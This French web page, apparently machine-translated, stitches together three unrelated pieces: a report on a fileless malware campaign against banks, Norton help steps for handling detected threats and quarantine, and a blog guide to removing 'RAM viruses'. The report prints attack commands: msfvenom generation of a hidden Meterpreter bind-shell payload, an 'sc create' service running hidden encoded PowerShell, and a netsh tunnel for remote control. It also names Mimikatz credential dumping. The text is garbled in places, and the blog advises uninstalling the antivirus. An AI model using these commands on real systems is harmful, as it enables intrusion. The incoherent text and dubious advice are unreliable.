Affichez et corrigez les menaces de sécurité des appareils détectées par Norton. Les logiciels malveillants "invisibles" ne laissent aucun fichier, se cachent dans la mémoire et attaquent les grandes entreprises Correction des menaces qui n'ont pas été éliminées lors de l'analyse

à propos d'une nouvelle campagne de logiciels malveillants intéressante qui a touché des banques, des télécommunications, des agences gouvernementales, ainsi que d'autres entreprises et organisations dans plus de quarante pays à travers le monde.

Les analystes de l'équipe GReAT écrivent que les spécialistes de l'équipe de sécurité bancaire ont été les premiers à remarquer la menace : alors en mémoire physique contrôleur de domaine, l'ID Meterpreter a été trouvé. Les produits Kaspersky Lab reconnaissent les problèmes tels que MEM:Trojan.Win32.Cometer et MEM:Trojan.Win32.Metasploit. Lorsque les analystes ont commencé à comprendre, en essayant de comprendre d'où venait le code en mémoire, ils ont également trouvé des scripts PowerShell dans Registre Windows, et l'utilitaire NETSH utilisé pour tunneliser le trafic vers le serveur C&C des attaquants.

De telles attaques sont appelées "sans fichier" (sans fichier), c'est-à-dire que le logiciel malveillant ne place aucun fichier sur le disque dur, mais que la charge utile est intégrée directement dans la mémoire et existe dans la RAM. Bien sûr, détecter et traquer une telle attaque est extrêmement difficile.

Schéma d'attaque

Les chercheurs expliquent que le framework Metasploit largement connu peut être utilisé pour créer des scripts, comme dans l'exemple ci-dessous.

Des scripts comme celui-ci aident à injecter Meterpreter dans la RAM. Msfvenom de Metasploit peut être utilisé pour les générer :

Msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd

Une fois le script généré, les attaquants utilisent Windows SC pour installer un service malveillant sur l'hôte cible (qui finira par exécuter le script ci-dessus). Cela peut être fait, par exemple, avec la commande suivante :

sc \\target_name create ATITscUA binpath= "C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…" start= manuel

L'étape suivante consiste à configurer le tunneling afin que la machine infectée devienne disponible pour l'hôte distant. Pour ce faire, les attaquants ont recours à la commande suivante :

netsh interface portproxy ajouter v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0

Par conséquent, tout le trafic réseau de 10.10.1.11:4444 sera redirigé vers 10.10.1.12:8080. Cette technique vous permet de configurer un tunnel proxy à travers lequel les criminels peuvent contrôler à distance un hôte PowerShell infecté.

Les analystes notent que l'utilisation de SC et NETSH nécessite des privilèges d'administrateur sur l'hôte local et distant. L'utilisation de scripts PowerShell malveillants nécessitera également une élévation des privilèges et des modifications de la politique d'exécution. Pour ce faire, les attaquants utilisent le dumper d'informations d'identification Mimikatz pour collecter les mots de passe des comptes sur la machine locale et les postes de travail environnants.

Après avoir étudié attentivement l'attaque contre l'une des banques touchées, les chercheurs sont arrivés à la conclusion que les opérateurs de cette campagne utilisaient des domaines de troisième niveau, ainsi que des domaines dans les zones .GA, .ML, .CF. Le fait est que ces domaines sont gratuits, ce qui signifie que les attaquants ne laissent pas d'informations WHOIS.

Résumant tout ce qui précède (en utilisant Metasploit et la norme Utilitaires Windows, domaines sans informations WHOIS), les chercheurs concluent que l'écriture manuscrite d'attaquants inconnus est très similaire au travail de groupes tels que GCMAN et Carbanak . Il n'y a cependant aucune preuve directe, il n'est donc pas possible de lier ces attaques silencieuses à un groupe particulier.

« Des techniques comme celles décrites dans ce rapport deviennent de plus en plus courantes, en particulier [lorsque des attaques sont menées] contre de grandes cibles dans le secteur bancaire. Malheureusement, l'utilisation d'outils simples, combinés à diverses astuces, rend extrêmement difficile la détection [de telles attaques]", résument les experts de GReAT.

Lorsque Norton détecte une menace, le programme la supprime automatiquement, sauf si votre intervention est nécessaire pour déterminer comment la menace est gérée. Dans de tels cas, Norton affiche une notification « Menaces détectées » ou « Menace de sécurité » avec les options disponibles pour répondre à la menace.

Afficher les menaces qui ont été automatiquement résolues lors d'une analyse

Lancez Norton.

Sécurité de l'appareil, cliquez sur Ouvrir .

Dans la fenêtre Journal de sécurité Menaces de sécurité résolues.

Sélectionnez une menace dans la liste et affichez les actions terminées dans le panneau Détails.

Dans certains cas, au lieu de corriger automatiquement une menace, Norton vous recommande d'entreprendre une action spécifique pour la corriger.

Correction des menaces qui n'ont pas été corrigées lors d'une analyse

Lancez Norton.

Si la fenêtre Mon Norton s'affiche à côté du Sécurité de l'appareil, cliquez sur Ouvrir .

Dans la fenêtre principale de Norton, double-cliquez sur Sécurité, puis sélectionnez Historique.

Dans la fenêtre Journal de sécurité dans la liste Afficher, sélectionnez Menaces de sécurité non résolues.

Si la liste contient des menaces non résolues, sélectionnez la menace qui vous intéresse.

S'il y a des raisons de croire que le système est infecté, exécutez Norton Power Eraser. Norton Power Eraser est outil puissant suppression des logiciels malveillants pour se débarrasser des menaces de sécurité les plus résistantes. Pour plus d'informations, consultez le document Exécution d'une analyse Norton Threat Detection sur votre PC

Norton Power Eraser est un outil de suppression de logiciels malveillants qui fonctionne en mode agressif. Parfois avec malware Norton Power Eraser peut supprimer des fichiers légitimes. Par conséquent, examinez attentivement les résultats de l'analyse avant de supprimer des fichiers.

Par défaut, Norton supprime les menaces de sécurité de votre ordinateur et les met en quarantaine. S'il y a des raisons de croire que le fichier a été supprimé par erreur, il peut être restauré de la quarantaine à son emplacement d'origine et exclu des analyses ultérieures.

Restaurer un fichier depuis la quarantaine

Lancez Norton.

Si la fenêtre Mon Norton s'affiche à côté du Sécurité de l'appareil, cliquez sur Ouvrir .

Dans la fenêtre principale de Norton, cliquez sur Sécurité, puis sélectionnez Historique.

Dans la fenêtre Journal de sécurité développez le menu Afficher et sélectionnez l'option Quarantaine.

Sélectionnez le fichier à restaurer.

Dans le panneau Détails, cliquez sur Options .

Dans la fenêtre Menace détectée sélectionner une équipe Restaurer et exclure ce fichier.

Dans la fenêtre Récupération de la quarantaine cliquez sur le bouton Oui.

Dans la fenêtre Rechercher un dossier, sélectionnez un dossier ou un lecteur pour placer le fichier restauré, puis cliquez sur OK.

Virus dans mémoire vive, ce phénomène est assez désagréable et malheureusement pas rare. très souvent, nous voyons un fichier caché mais nous ne pouvons en aucun cas le supprimer - il continue d'apparaître et d'apparaître, ou le système d'exploitation lui-même Système Windows ne le permet pas.

Soit dit en passant, il se manifeste beaucoup plus souvent dans les cas mauvais réglage antivirus ou son absence. Si vous êtes dans une telle situation, je vous recommande de lire l'article - Installation et configuration d'un antivirus sous Windows. Avant de supprimer un virus de la RAM, vous devez comprendre ce qui se passe avec le programme antivirus installé sur votre ordinateur. Très probablement, votre programme antivirus a été "détruit" par un virus qui est apparu. Il est également possible que l'arsenal de signatures de votre programme antivirus ne dispose pas d'une méthode pour effacer complètement le virus de la collecte en temps opportun et que le programme essaie uniquement de supprimer infection virale pas le virus lui-même.

Il arrive souvent qu'un virus transfère des programmes et des fichiers supplémentaires pour son propre travail, ou commence automatiquement à fonctionner, et maintenant le programme antivirus détectera ces copies, mais ne détectera pas le code source (virus) et, dans la plupart des cas, ne pourra pas faire face à ce.

1. Nous supprimons (à l'aide du programme de désinstallation - ajouter / supprimer des programmes) le programme antivirus installé, il est inutile ici.
2. Téléchargez Ccleaner sur Internet et installez-le. Commençons, d'abord nous effaçons les dossiers temporaires. Ce logiciel convient utilisateurs ordinaires, sur cette base, il est possible de mettre toutes les cases à cocher dans paramètres - personnalisés cela n'effacera pas les données ! J'ai écrit plus sur le programme dans l'article - nettoyage du registre.
3. Ensuite, nous avons besoin d'un utilitaire de nettoyage de virus pour nous aider. J'ai écrit à leur sujet dans l'article - utilitaires gratuits pour supprimer les virus. Nous choisissons n'importe lequel. Par exemple, téléchargez le programme Dr.web Cure it sur Internet et installez-le.
4. Nous installons la mise à jour, exécutons l'un des deux scans (rapide ou complet). Un balayage rapide donne en principe un résultat efficace. Tous les virus détectés sont supprimés. Nous redémarrons l'ordinateur.
5. Téléchargement d'un nouvel antivirus. Fondamentalement important ! Si, avant le problème, vous aviez installé l'antivirus Eset NOD32, installez alors Avast ou Avira, si Avast était installé, installez Eset, ou tout autre programme antivirus de votre choix.
6. Il est assez facile d'interpréter de telles actions, le programme antivirus que vous aviez probablement était endommagé, les données du registre pourraient rester, ce qui entraînerait un fonctionnement inexact du programme antivirus, d'autant plus que ce programme antivirus particulier n'a pas trouvé de menace d'Internet sur votre ordinateur.